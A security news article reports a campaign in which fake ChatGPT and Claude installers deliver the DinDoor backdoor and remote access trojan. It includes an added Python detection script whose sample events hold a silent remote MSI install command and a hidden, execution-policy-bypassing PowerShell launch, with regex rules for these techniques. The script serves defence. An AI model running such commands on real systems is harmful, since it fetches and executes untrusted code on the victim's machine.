Fake ChatGPT and Claude Installers Spread DinDoor Backdoor in New Malware Campaign

Attackers are using compromised YouTube channels and trusted platforms like GitHub to distribute fake installers that deliver the DinDoor backdoor, compromising systems of AI enthusiasts and content creators.

CSBadmin

Malicious Installers Target AI Enthusiasts

A new malware campaign is deceiving content creators, gamers, and AI enthusiasts by offering fake installers for popular software tools such as ChatGPT and Claude. These counterfeit files, hosted on well-known platforms like GitHub and SourceForge, deliver a powerful backdoor named DinDoor. The attackers have also compromised YouTube channels, using AI-generated videos to drive traffic to the malicious repositories. Some of these videos have already garnered over 50,000 views, indicating a significant reach and potential for widespread infection.

Security researchers at Malwarebytes identified the campaign after discovering suspicious installers and plugins impersonating not only ChatGPT and Claude but also Ableton Live, AutoTune, and Kontakt. By leveraging the inherent trust users place in GitHub and SourceForge, the attackers make their fake projects appear legitimate, luring victims into downloading the harmful payload.

Infection Chain and Capabilities

Once a user visits a compromised repository and executes a copied command in their terminal, thinking they are installing genuine software, the infection begins. The command silently downloads an MSI installer file and runs it through Windows' built-in installer tool. This MSI file then deploys a CMD file and a PowerShell script onto the victim's system. The PowerShell script proceeds to install the Deno JavaScript runtime using standard Windows package managers like Scoop and WinGet, furthering the attack.
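As an added illustration, not part of the original article or of Malwarebytes' research, the following Python shows how a defender could flag the chain just described in process-creation telemetry (Sysmon Event ID 1 or equivalent EDR records). The sample events, file paths and the WinGet package name are constructed assumptions; the rule logic keys on the behaviours the article names: msiexec fetching an MSI from a URL, the installer spawning a shell, and a script-driven install of Deno.

```python
import re

# Constructed process-creation events (not real telemetry), mirroring the chain:
# shell -> msiexec with a remote MSI -> cmd -> hidden PowerShell -> WinGet installing Deno.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c msiexec /i https://repo.example.invalid/setup.msi /qn"},
    {"parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /i https://repo.example.invalid/setup.msi /qn"},
    {"parent": "msiexec.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\Public\run.cmd"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Public\stage.ps1"},
    {"parent": "powershell.exe", "image": "winget.exe",
     "cmdline": "winget install deno"},          # package name is an assumption
    # Benign control case: a locally downloaded MSI launched by the user from Explorer.
    {"parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\Downloads\vendor.msi"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
REMOTE_MSI = re.compile(r'/i\s+"?https?://', re.IGNORECASE)
HIDDEN_PS = re.compile(r"-(ExecutionPolicy\s+Bypass|ep\s+bypass|WindowStyle\s+Hidden|w\s+hidden)", re.IGNORECASE)
PKG_DENO = re.compile(r"\b(scoop|winget)\b.*\binstall\b.*\bdeno\b", re.IGNORECASE)

def classify(ev):
    """Return the names of the detection rules a single event matches (possibly none)."""
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    hits = []
    if image == "msiexec.exe" and REMOTE_MSI.search(cmd):
        hits.append("msiexec_remote_url")        # MSI pulled straight from the internet
    if parent == "msiexec.exe" and image in SHELLS:
        hits.append("installer_spawned_shell")   # installer custom action dropping to cmd/powershell
    if image in SHELLS and HIDDEN_PS.search(cmd):
        hits.append("hidden_powershell")         # policy bypass / hidden window flags
    if parent in SHELLS and PKG_DENO.search(cmd):
        hits.append("script_installs_deno")      # package manager fetching the Deno runtime
    return hits

def scan(events):
    """Map event index -> matched rules, keeping only events that matched something."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}

CHAIN = {"msiexec_remote_url", "installer_spawned_shell", "script_installs_deno"}

def chain_detected(events):
    """True when every stage of the dropper chain is visible in the event stream."""
    seen = set()
    for hits in scan(events).values():
        seen.update(hits)
    return CHAIN <= seen
```

Individually, each rule will fire on some legitimate administration; correlating all three stages on one host within a short window is what separates this chain from a normal package install.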

After installation, DinDoor establishes a connection to a command-and-control server, enabling the delivery of a full-featured remote access Trojan. This RAT can steal data from browsers and cryptocurrency wallets, capture screenshots, record clipboard activity, and even spy on victims through a hidden video stream that uses the Microsoft Edge browser as cover. The backdoor's capability to remain undetected while exfiltrating sensitive information makes it a serious threat to both individual users and organizations.

Source: Cyber Security News
